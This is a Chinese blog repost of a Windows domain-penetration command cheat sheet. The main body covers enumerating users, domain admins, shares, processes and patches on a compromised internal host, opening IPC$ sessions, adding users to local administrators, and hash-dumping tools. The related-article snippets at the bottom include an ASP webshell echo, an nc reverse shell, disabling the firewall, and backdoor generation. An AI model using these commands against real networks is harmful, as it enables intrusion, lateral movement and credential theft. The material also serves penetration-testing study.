Windows常用内容渗透命令

最新推荐文章于 2024-05-23 12:30:00 发布
最新推荐文章于 2024-05-23 12:30:00 发布
阅读量399 收藏 4
点赞数
文章标签: 操作系统 运维 java
原文链接:http://www.cnblogs.com/skyus/p/8579521.html
版权

假设现在已经拥有一台内网[]机器,取名X-007.

1-1.内网[]信息收集

A.本机X-007信息收集.

 

          [+]------用户列表[Windows用户列表/邮件用户/...]
                                       ---->分析Windows用户列表,不要忽略administrator.
                                       ---->分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户,例如:owa
          [+]------进程列表
                                       ---->分析杀毒软件/安全监控工具等
                                       ---->邮件客户端
                                       ---->VPN等
          [+]------服务列表
                                       ---->与安全防范工具有关服务[判断是否可以手动开关等]
                                       ---->存在问题的服务[权限/漏洞]
          [+]------端口列表
                                       ---->开放端口对应的常见服务/应用程序[匿名/权限/漏洞等]
                                       ---->利用端口进行信息收集,建议大家深入挖掘[NETBIOS,SMB等]
          [+]------补丁列表
                                       ---->分析Windows补丁
                                       ---->第三方软件[Java/Oracle/Flash等]漏洞
          [+]------本机共享[域内共享很多时候相同]
                                       ---->本机共享列表/访问权限
                                       ---->本机访问的域共享/访问权限
          [+]------本地用户习惯分析
                                       ---->历史记录
                                       ---->收藏夹
                                       ---->文档等

 

B.扩撒信息收集

 

          [+]------利用本机获取的信息收集内网[域]其他机器的信息.
       ----用户列表/共享/进程/服务等.[参考上面]
 
          [+]------收集Active Directory信息
       ----最好是获取AD副本.  

 

 

   ------------------------------  常见信息收集命令----------------------------------
   net user                   ------> 本机用户列表
   net localhroup administrators  ------> 本机管理员[通常含有域用户]
   net user /domain     ------> 查询域用户
   net group /domain  ------> 查询域里面的工作组
   net group "domain admins" /domain  ------> 查询域管理员用户组
   net localgroup administrators /domain  ------> 登录本机的域管理员
   net localgroup administrators workgroup\user001 /add  ----->域用户添加到本机
   net group "Domain controllers"   -------> 查看域控制器(如果有多台)
   ----------------------------------------------------------------------------------------
   ipconfig /all            ------> 查询本机IP段,所在域等
   net view                  ------> 查询同一域内机器列表
   net view /domain   ------> 查询域列表
   net view /domain:domainname  -----> 查看workgroup域中计算机列表
 -------------------第三方信息收集-----------------
 NETBIOS 信息收集工具
 SMB信息收集
 空会话信息收集
 端口信息收集
 漏洞信息收集
 ……

 

如果可能,建议弄一张内网拓扑图,这样方便下面的渗透工作.

1-2.内网[]渗透

[推荐阅读]

 

 黑客大曝光-前三章
 内网渗透 by 樱木花道
 Microsoft-word-pen-testing-windows-active-directory
 Pen-testing-windows-active-directory
 Windows Privilege Escalation Part 1
 Windows Privilege Escalation Part 2

 

内网[]渗透,不外乎获取内网[]最高权限.
通常做法就是拿到某个域管理员的口令,然后控制域服务器,获取更多的信息.
如何获取域管理员口令,做法可能各不相同.

上次发了一篇文章—【再探内网(域)渗透】,讨论的人不少,比较开心.但是,总有一种感觉,那就是大家话到嘴边就停住了,让人很心急.

希望在此能够通过我的破文,引起渗透爱好者的讨论.了解域渗透的兄弟姐妹,请不要吝啬自己的技术,真心希望大家能分享一下自己渗透中的点点滴滴.请指点一下那些一直在努力的花朵们.

如果可能,希望大家续贴发表自己的渗透心得,让内网渗透能够成为专题贴…..在此先献上一朵小红花.
欢迎来信指点:hap.ddup[at]gmail.com

============================================================

内网(域)渗透–1.基本命令

————————————————————————————————————

 

ipconfig /all                ------ 查询本机IP段,所在域等 
net user                     ------ 本机用户列表 
net localhroup administrators       ------ 本机管理员[通常含有域用户] 
net user /domain                        ------ 查询域用户 
net group /domain                      ------ 查询域里面的工作组
net group "domain admins" /domain       ------ 查询域管理员用户组 
net localgroup administrators /domain    ------ 登录本机的域管理员
net localgroup administrators workgroup\user001 /add   ------域用户添加到本机
net group "domain controllers" /domain                         ------ 查看域控制器(如果有多台) 
net time /domain          ------ 判断主域,主域服务器都做时间服务器 
net config workstation   ------ 当前登录域 
net session                  ------ 查看当前会话 
net use \\ip\ipc$ pawword /user:username      ------ 建立IPC会话[空连接-***] 
net share                    ------  查看SMB指向的路径[即共享]
net view                      ------ 查询同一域内机器列表 
net view \\ip                ------ 查询某IP共享
net view /domain         ------ 查询域列表
net view /domain:domainname        ------ 查看workgroup域中计算机列表 
net start                                         ------ 查看当前运行的服务 
net accounts                                   ------  查看本地密码策略 
net accounts /domain                      ------  查看域密码策略 
nbtstat –A ip                                   ------netbios 查询 
netstat –an/ano/anb                        ------ 网络连接查询 
route print                                      ------ 路由表

 

=============================================================  

 

dsquery computer       ----- finds computers in the directory.
dsquery contact           ----- finds contacts in thedirectory.
dsquery subnet            ----- finds subnets in thedirectory.
dsquery group             ----- finds groups in thedirectory.
dsquery ou                   ----- finds organizationalunits in the directory.
dsquery site                 ----- finds sites in thedirectory.
dsquery server             ----- finds domain controllers inthe directory.
dsquery user                ----- finds users in thedirectory.
dsquery quota              ----- finds quota specificationsin the directory.
dsquery partition         ----- finds partitions in thedirectory.
dsquery *                     ----- finds any object inthe directory by using a generic LDAP query.
dsquery server –domain Yahoo.com | dsget server–dnsname –site ---搜索域内域控制器的DNS主机名和站点名
dsquery computer domainroot –name *-xp –limit 10----- 搜索域内以-xp结尾的机器10台
dsquery user domainroot –name admin* -limit ---- 搜索域内以admin开头的用户10个
……
……
[注:dsquery来源于Windows Server 2003 Administration Tools Pack]

 

=============================================================    

 

tasklist /V                                                      ----- 查看进程[显示对应用户]
tasklist /S ip /U domain\username /P /V             ----- 查看远程计算机进程列表
qprocess *                                                    ----- 类似tasklist
qprocess /SERVER:IP                                      ----- 远程查看计算机进程列表
nslookup –qt-MX Yahoo.com                           ----- 查看邮件服务器
whoami /all                                                   ----- 查询当前用户权限等
set                                                              ----- 查看系统环境变量
systeminfo                                                    ----- 查看系统信息
qwinsta                                                        ----- 查看登录情况
qwinsta /SERVER:IP                                       ----- 查看远程登录情况
fsutil fsinfo drives                                           ----- 查看所有盘符
gpupdate /force                                            ----- 更新域策略

 

=============================================================  

 

wmic bios                                                     ----- 查看bios信息
wmic qfe                                                      ----- 查看补丁信息
wmic qfe get hotfixid                                     ----- 查看补丁-Patch号
wmic startup                                                 ----- 查看启动项
wmic service                                                 ----- 查看服务
wmic os                                                       ----- 查看OS信息
wmic process get caption,executablepath,commandline
wmic process call create “process_name” (executes a program)
wmic process where name=”process_name” call terminate (terminates program)
wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size,
volumeserialnumber (hard drive information)
wmic useraccount (usernames, sid, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? for gets help ! )
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)

———————————————————————————————————————————-

Password hashes dump tools                         ————–  抓hash工具列表[大集合]

转载于:https://www.cnblogs.com/skyus/p/8579521.html

dengliang7440
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全入门必备:渗透常用命令速查手册
小王的储物间
02-16 6386
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
常用Dos命令.txt
07-28
一些Windows常用的cmd命令,一般网络安全工作从业者常用,一般用于主机渗透,主机攻防,配合一些漏洞会达到意想不到的效果,欢迎下载,欢迎讨论,欢迎补充。
渗透测试中常用WINDOWS命令
AdminTony的博客
11-06 636
渗透测试中常用WINDOWS命令 ifconfig /all 获取获取域名、IP地址、DHCP服务器、网关、MAC地址、主机名 net time /domain 查看域名、时间 net view /domain 查看域内所有共享 net view ip 查看对方局域网内开启了哪些共享 net config workstation 查看域名、机器名等 net user 用户名 密码 /add 建立...
Kali渗透Windows服务器
最新发布
A_991128a的博客
05-23 651
本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;1、 实战步骤一:生成setup.exe后门程序,即木马程序。(1) 打开kali终端,输入ifconfig, 得到本机ip为192.168.189.130。如下图:(2)输入以下命令,使用msfpayload生成名为setup的后门程序:如下图:(3) 进入setup.exe所在目录,修改属性:选择“允许以程序执行文件”。
windows渗透常用命令
qq_45780190的博客
12-17 762
net 的常用用法 查看共享连接 net use 增加远程共享 net use host /u:user pass 查看域中当前的主机列表 net view /domain 查看当前域中的用户 net user /domain 增加一个本地用户 net user user pass /add 将新增的用户加到本地管理员组 net localgroup "Administrators" user /add 查看域中的密码策略 net accounts /domain 查看本地组 net loca
渗透常用命令
weixin_30477293的博客
04-17 69
IPC$入侵常用命令 当然假设管理员账户名密码已经得到了net use\\ip\ipc$"密码" /user:"用户名"  ——密码和用户名如果没有空格也可以不加引号,另外\ipc$也可以不写,如下所示:net use\\ip密码 /user:用户名sc\\ipconfig tlntsvr start= auto  ——注意start=后面有个空格sc\\ipstart tlnt...
metasploit常用渗透命令.zip
09-16
本资料“metasploit常用渗透命令”主要聚焦于Metasploit框架中的常用命令,帮助用户理解和掌握其核心功能。 在Metasploit框架中,主要涉及以下几个关键概念: 1. **Meterpreter**:Meterpreter是一种动态的、功能...
常用的黑客DOC命令
01-03
下面,我们将深入探讨一些常用的黑客CMD命令及其在Windows环境中的应用。 1. **系统信息获取**: - `systeminfo`:显示系统的详细信息,包括操作系统版本、硬件配置等。 - `ipconfig`:查看网络配置,包括IP地址...
windows系统基础.rar
05-16
在“windows系统基础.rar”这个压缩包中,包含了一系列关于Windows操作系统、命令行以及相关编程开发和黑客渗透的基础知识。这些资源旨在帮助用户深入理解Windows系统的基本操作,并且通过CMD命令行来提升效率。以下...
web安全渗透测试.7z
04-08
在Web安全领域,渗透测试常常涵盖SQL注入、XSS攻击、文件包含漏洞、命令注入、权限绕过等测试项目。 【压缩包子文件的文件名称列表】 1. **lanmp.sh** - 这可能是一个安装LAMP(Linux, Apache, MySQL, PHP)环境的...
windows下面常用的***测试命令
weixin_34354173的博客
08-21 310
echo ^<%eval request(“#”)%^> >C:\wmpub\hkfe666\h4ck.asp Md hack 创建hack文件夹 本地nc -vv -p -l 端口服务器nc路径 -e cmd路径 ip 端口 Rd hack 删除hack文件夹 Type d:\wwwroot\hack.asp 查看一句话*...
渗透windows 常用命令
m0_46304840的博客
02-12 464
目录 前言: 正文: 0x01 文件操作命令 0x02 查看系统属性 0x03 NET命令 0x04 其他常用命令 文末: 前言: 发现linux常用命令差不多了,所以我就写个windows下的常用命令 由于一时间没法记得那么多,我后期会不断的修改添加。用到新的命令,就会添加进去。 欢迎大家来加我微信,一起讨论技术,文末我会贴出二维码~~~ 正文: 0x01...
windows环境渗透常用系统命令
kaitoulee
05-25 1012
禁用windows防火墙 netsh advfirewall set currentprofile state off netsh adbfirewall set all profiles state off 本机windows端口转发(必须是管理员权限)不需要借助第三方软件进行转发 启用转发 netsh interface port proxy add v4tov4 listenpor
windows渗透_汇总常见快捷命令
chenfeng857的博客
09-30 797
解决反弹shell乱码 修复乱码chcp 65001 文件融合 将Trace与beacon融合成为 2.exe,由于破坏了pe结构所以无法执行 copy Trace.exe/b +beacon.exe/a 2.exe 日常运维 任务管理器 taskmgr 查看已打补丁 wmic qfe get Caption,Description,HotFixID,InstalledOn 路由表 route print 查找某个文件的路径 dir /s 1.exe 计算机管理 compmgmt.msc 查看当前是
windows渗透测试常用命令
Y525698136的博客
01-12 862
windows渗透测试常用命令
渗透测试】渗透测试中常用的window命令
weixin_43822401的博客
02-02 232
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写。netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)psexec.exe \\目标IP -u username -p password -s cmd 在目标机器上执行cmd。wmic /node:"目标IP" /password:"123456" /user:"admin" 连接目标机器。
Windows内网渗透信息搜集命令总汇
weixin_45995579的博客
06-22 534
windows内网渗透命令
渗透测试基础- - -windows网络安全常用dos命令
weixin_67503304的博客
10-26 4456
本文主要从网络安全的角度讲解了windows中的dos命令的基本使用方法。
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
在"红蓝对抗之Windows内网渗透-腾讯SRC出品1"中,作者深入探讨了Windows内网渗透的各种技巧和方法,主要针对的是企业内部的安全挑战。文章从以下几个关键点展开: 1. **端口连接**:利用netstat-ano命令分析机器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值